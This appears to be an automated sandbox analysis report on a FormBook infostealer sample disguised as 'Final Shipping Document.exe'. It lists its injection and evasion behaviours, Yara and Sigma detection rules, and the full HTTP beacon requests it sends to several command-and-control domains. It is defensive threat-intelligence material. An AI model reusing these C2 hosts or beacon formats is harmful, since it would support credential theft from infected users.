
Windows Analysis Report
Final Shipping Document.exe

Overview

General Information

Sample name: Final Shipping Document.exe
Analysis ID: 1483158
MD5: 2d3ecaf3008e1d47782f668f713b35b1
SHA1: 35ea8d6a9836384c69829e1a87ddb08c1f647fc7
SHA256: c2c3f4d25be2c10f834a4804172d58ee35adc35accd66227d7d89d9ae978e04d
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for reading data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Final Shipping Document.exe (PID: 4568 cmdline: "C:\Users\user\Desktop\Final Shipping Document.exe" MD5: 2D3ECAF3008E1D47782F668F713B35B1)
    • svchost.exe (PID: 3220 cmdline: "C:\Users\user\Desktop\Final Shipping Document.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • QnAcfZuONg.exe (PID: 7100 cmdline: "C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • gpupdate.exe (PID: 6752 cmdline: "C:\Windows\SysWOW64\gpupdate.exe" MD5: 6DC3720EA74B49C8ED64ACA3E0162AC8)
          • QnAcfZuONg.exe (PID: 7156 cmdline: "C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6692 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.3890307016.0000000003470000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.3890307016.0000000003470000.00000040.00000001.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x590df:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x41b2e:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.3890277964.0000000004C20000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.3890277964.0000000004C20000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2b930:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1437f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.3890392415.0000000004C70000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2df83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x169d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ed83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x177d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\Final Shipping Document.exe", CommandLine: "C:\Users\user\Desktop\Final Shipping Document.exe", CommandLine|base64offset|contains: J), Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Final Shipping Document.exe", ParentImage: C:\Users\user\Desktop\Final Shipping Document.exe, ParentProcessId: 4568, ParentProcessName: Final Shipping Document.exe, ProcessCommandLine: "C:\Users\user\Desktop\Final Shipping Document.exe", ProcessId: 3220, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\Final Shipping Document.exe", CommandLine: "C:\Users\user\Desktop\Final Shipping Document.exe", CommandLine|base64offset|contains: J), Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Final Shipping Document.exe", ParentImage: C:\Users\user\Desktop\Final Shipping Document.exe, ParentProcessId: 4568, ParentProcessName: Final Shipping Document.exe, ProcessCommandLine: "C:\Users\user\Desktop\Final Shipping Document.exe", ProcessId: 3220, ProcessName: svchost.exe
            No Snort rule has matched
Timestamp: 2024-07-26T18:45:24.949358+0200 | SID: 2022930 | Source Port: 443 | Destination Port: 55136 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 2024-07-26T18:45:27.280649+0200 | SID: 2022930 | Source Port: 443 | Destination Port: 55137 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 2024-07-26T18:45:15.652468+0200 | SID: 2022930 | Source Port: 443 | Destination Port: 49705 | Protocol: TCP | Classtype: A Network Trojan was detected


            AV Detection

Source: http://www.9muyiutyt.online/39t8/?ejlto=QtkhctgpxJahPP0&1Hg=89XVD+Uem60dZ1sDkhzA52EMF3du5QagyTQWgC74INncPQoYck8yZMKmhHYNHaZtvErKW4LDM1h+RSXnGPYlre6VurbK/jTyWP4vAbFcilh1x/G4ZSBU3Zl0LqnbfRVoCA== | Avira URL Cloud: Label: malware
Source: https://www.9muyiutyt.online/39t8/?ejlto=QtkhctgpxJahPP0&1Hg=89XVD | Avira URL Cloud: Label: malware
Source: http://www.9muyiutyt.online/39t8/ | Avira URL Cloud: Label: malware
Source: Final Shipping Document.exe | ReversingLabs: Detection: 63%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3890307016.0000000003470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3890277964.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3890392415.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2370426785.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3892567751.0000000005550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2370049764.0000000003220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3888449538.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2369314894.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Final Shipping Document.exe | Joe Sandbox ML: detected
Source: Final Shipping Document.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: gpupdate.pdb source: svchost.exe, 00000002.00000002.2369677199.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337564698.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, QnAcfZuONg.exe, 00000004.00000002.3889291851.0000000000E18000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: gpupdate.pdbGCTL source: svchost.exe, 00000002.00000002.2369677199.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337564698.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, QnAcfZuONg.exe, 00000004.00000002.3889291851.0000000000E18000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QnAcfZuONg.exe, 00000004.00000002.3888447238.00000000001AE000.00000002.00000001.01000000.00000005.sdmp, QnAcfZuONg.exe, 00000007.00000002.3888452775.00000000001AE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Final Shipping Document.exe, 00000000.00000003.2037587042.0000000004060000.00000004.00001000.00020000.00000000.sdmp, Final Shipping Document.exe, 00000000.00000003.2037285310.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2370090803.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157508519.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2370090803.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2150327678.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000003.2376668262.0000000004CDF000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000003.2369961952.0000000004B22000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3890618896.000000000502E000.00000040.00001000.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3890618896.0000000004E90000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Final Shipping Document.exe, 00000000.00000003.2037587042.0000000004060000.00000004.00001000.00020000.00000000.sdmp, Final Shipping Document.exe, 00000000.00000003.2037285310.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2370090803.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157508519.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2370090803.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2150327678.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, gpupdate.exe, 00000005.00000003.2376668262.0000000004CDF000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000003.2369961952.0000000004B22000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3890618896.000000000502E000.00000040.00001000.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3890618896.0000000004E90000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: gpupdate.exe, 00000005.00000002.3888691030.0000000003149000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3891568008.00000000054BC000.00000004.10000000.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3890876072.000000000311C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2778259246.000000003C12C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: gpupdate.exe, 00000005.00000002.3888691030.0000000003149000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3891568008.00000000054BC000.00000004.10000000.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3890876072.000000000311C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2778259246.000000003C12C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C0DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C0DBBE
Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00BDC2A2 FindFirstFileExW,0_2_00BDC2A2
Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C168EE FindFirstFileW,FindClose,0_2_00C168EE
Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C1698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00C1698F
Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C0D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C0D076
Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C0D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C0D3A9
Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C19642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C19642
Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C1979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C1979D
Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C19B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00C19B2B
Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C15C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00C15C97
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_02D9C390 FindFirstFileW,FindNextFileW,FindClose,5_2_02D9C390
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 4x nop then xor eax, eax | 5_2_02D89B70
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 4x nop then mov ebx, 00000004h | 5_2_04D604E8

            Networking

            Source: DNS query: www.pqnqxn.xyz
            Source: DNS query: www.gridban.xyz
Source: Joe Sandbox View | IP Address: 178.212.35.248
Source: Joe Sandbox View | IP Address: 104.21.59.240
Source: Joe Sandbox View | IP Address: 188.114.96.3
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C1CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00C1CE44
Source: global traffic | HTTP traffic detected:
  GET /hugu/?ejlto=QtkhctgpxJahPP0&1Hg=vP/uG1dCvZ4PilGLFureb44eipjsuOvQXbL49xadF8bamHBm064La/heTQ4Pfno94C0sjxAGfQAAlyvLUXQlTtZB4zIUvEoM3zQ61bjQ13shwgtlO8h70X3QY/xUTFtAQA== HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Connection: close
  Host: www.toppersbusiness.net
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic | HTTP traffic detected:
  GET /wptv/?1Hg=UBaSdI4L0SLSC905rDSQkq9H8MI7DUlv5ISEnSSRcSh4rK6z4u+7wt/PvR1ecI/XTQn9u86KuHymNqf2TqtSEsuZKbYYXqmtSyS/3vOPWUm+34EGC7zgpqm6nqQHfZAfNA==&ejlto=QtkhctgpxJahPP0 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Connection: close
  Host: www.rajveena.online
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic | HTTP traffic detected:
  GET /fku9/?1Hg=8+E5hHkJAI9KLzdnRfLjsdta627301LWvCxQnfER7jE6HhXelR0L8M6eacA5uvGu6fFFzcUJZ3XtElIgDxgrCowK6qnc0dbjxbukcDgECY4ZLyFshyoZroDOS+2pE7Poig==&ejlto=QtkhctgpxJahPP0 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Connection: close
  Host: www.pqnqxn.xyz
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic | HTTP traffic detected:
  GET /htli/?ejlto=QtkhctgpxJahPP0&1Hg=FjHjKNi/s/5kx+KnkSdD7DBcT3to66u90TWIQenAa0cXcBEeV9ZBFtbsq/uwbVXzm5/jkr9fdxMKasz/2IuVvEkWA5eWfr+6uK8ix+bvoaaPZEzC/cixV8fHHlKsAdCdfw== HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Connection: close
  Host: www.lovezi.shop
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic | HTTP traffic detected:
  GET /qogc/?1Hg=gSefwjuKZsCuEGncBKSqgUjxJH+JcQqz+YMIzSjuOw+Y7MS0RxllxFRTV2Gn+zIiEtGaIum1DRHYZfVjpe+PZ37sYiWUr85MYTmGz//Zl0zNgUvOn9EXUqnEL5f2vZZjHw==&ejlto=QtkhctgpxJahPP0 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Connection: close
  Host: www.artfulfusionhub.lat
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic | HTTP traffic detected:
  GET /39t8/?ejlto=QtkhctgpxJahPP0&1Hg=89XVD+Uem60dZ1sDkhzA52EMF3du5QagyTQWgC74INncPQoYck8yZMKmhHYNHaZtvErKW4LDM1h+RSXnGPYlre6VurbK/jTyWP4vAbFcilh1x/G4ZSBU3Zl0LqnbfRVoCA== HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Connection: close
  Host: www.9muyiutyt.online
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic | HTTP traffic detected:
  GET /1wd4/?1Hg=ScHcXTKAO5eSE6uaWkYIjyQnfQ68P9tZ9TtcMsVrul6RoGZN9pvJIdRIgUxQy3rdaSGeQ+CIaUiYSa72rbvJ1wEunXVWpcUP89m8x1dRGPimMbT7bK/R3/HUlg93LDGrxg==&ejlto=QtkhctgpxJahPP0 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Connection: close
  Host: www.suntextmeetings.online
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic | HTTP traffic detected:
  GET /hheq/?1Hg=OQHjTIEzxI4+3uBJ4Ch4/gBE3u2u+7BoOuCOJurFjFRPYCarRFUfzgF9IWvn7XTpBRUAmOCVXs1kY9Zsut6EdHJsI9AJbTCs7iVD1ouYIWNqRmE7fP7CptgJfBKNW9KUkg==&ejlto=QtkhctgpxJahPP0 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Connection: close
  Host: www.gridban.xyz
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic | DNS traffic detected: DNS query: www.toppersbusiness.net
Source: global traffic | DNS traffic detected: DNS query: www.rajveena.online
Source: global traffic | DNS traffic detected: DNS query: www.76716e97778bac2e.com
Source: global traffic | DNS traffic detected: DNS query: www.pqnqxn.xyz
Source: global traffic | DNS traffic detected: DNS query: www.lovezi.shop
Source: global traffic | DNS traffic detected: DNS query: www.artfulfusionhub.lat
Source: global traffic | DNS traffic detected: DNS query: www.9muyiutyt.online
Source: global traffic | DNS traffic detected: DNS query: www.suntextmeetings.online
Source: global traffic | DNS traffic detected: DNS query: www.gridban.xyz
Source: global traffic | DNS traffic detected: DNS query: www.xawcfzcql9tcvj.shop
Source: unknown | HTTP traffic detected:
  POST /wptv/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.5
  Content-Type: application/x-www-form-urlencoded
  Connection: close
  Cache-Control: max-age=0
  Content-Length: 204
  Host: www.rajveena.online
  Origin: http://www.rajveena.online
  Referer: http://www.rajveena.online/wptv/
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
  Data Ascii: 1Hg=ZDyye/AZ2xXJCf5aria9kJlTlNMzOEJ2gZmi5zuPaxh82Y/jovGugcmTuAFZEPfYGAb9vNft30zbS6r2TaIHEsmIUrp+Ub+4VHn83dOlZT2RreAoGrbjm6XugJYWQ61yRsibMX7iFrQj+HMk8TIwhN6EpAULsQ1PUJQc084rbVhzGvBsCUdKTcftOhoAQctfrtNGZMA=
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Connection: close
  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
  pragma: no-cache
  content-type: text/html
  content-length: 1251
  date: Fri, 26 Jul 2024 16:45:51 GMT
  server: LiteSpeed
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Fri, 26 Jul 2024 16:47:06 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Expires: Wed, 11 Jan 1984 05:00:00 GMT
  Cache-Control: no-cache, must-revalidate, max-age=0
  Link: <https://artfulfusionhub.lat/wp-json/>; rel="https://api.w.org/"
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AI1M55TCg5bz0CP6bvjRaeKaBaNTeUnQUyDSAAZDD6wgnUR2XV6dfVpVcdasvqe3te3pU6SQSbHyar3WBq4FJrsn37%2Fym5ti4frKJgOdILvv3OoSDQvUddBRKkwDcR1WAnMdQFQMc6zjog%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8a95de9e6a0217ed-EWR
  Content-Encoding: gzip
  alt-svc: h3=":443"; ma=86400
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Fri, 26 Jul 2024 16:47:09 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Expires: Wed, 11 Jan 1984 05:00:00 GMT
  Cache-Control: no-cache, must-revalidate, max-age=0
  Link: <https://artfulfusionhub.lat/wp-json/>; rel="https://api.w.org/"
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vyx4OccAPKycjOy9lPhVF6kuv9neiD6ccNrXu9Yr46Izv%2Fef%2FzVCbdPC8AeCAq1vWwmdcjrLm0wsJHrW5c6ly2XGOOhd4sls5cOBHPlA%2FY5GJf2zrNMjSeRqC7LvXAbkXK7J4nxlRRFOLw%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8a95deae9caf4370-EWR
  Content-Encoding: gzip
  alt-svc: h3=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 16:47:31 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
